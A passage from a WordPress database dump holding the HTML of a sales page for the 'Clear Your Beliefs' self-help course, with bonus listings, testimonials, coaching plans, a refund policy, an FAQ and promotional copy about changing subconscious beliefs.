growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">Optional: Professional Coaching Sessions</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>You can easily take this journey on your own, one recorded session at a time.  You also have the option of adding personalized support from a <em>Clear Your Beliefs Coach</em> – a qualified professional who will accompany you on your journey and guide you, step-by-step, through the process.\r\n\r\nOur outstanding coaches are trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\r\n\r\n<em>Clear Your Beliefs Coaches</em> are located throughout the United States and Canada, and worldwide, from Europe to Australia, and South Africa to Scandinavia. Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\r\n\r\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\r\n\r\nTake advantage of this up-close-and-personal support during the program.  Support sessions are optional, and are provided at an additional cost.  <strong>Choose the plan that suits you best - from the recorded program-only, to full support each week.</strong>\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n&nbsp;\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="s20">Praise for Lion and Clear Your Beliefs</h1>\r\n[Place all testimonials here, in a wide box]\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n\r\nOR\r\n\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>Frequently Asked Questions</h1>\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n<strong>Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n<strong>Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n<strong>Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n<strong>Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n<strong>Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-19 02:19:56', '2014-06-19 07:19:56', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1053, 2, '2014-06-20 19:14:01', '2014-06-21 00:14:01', '', 'Carista Portrait 3', '', 'inherit', 'closed', 'open', '', 'carista-portrait-3', '', '', '2014-06-20 19:14:01', '2014-06-21 00:14:01', '', 915, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1054, 2, '2014-06-20 19:14:33', '2014-06-21 00:14:33', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: 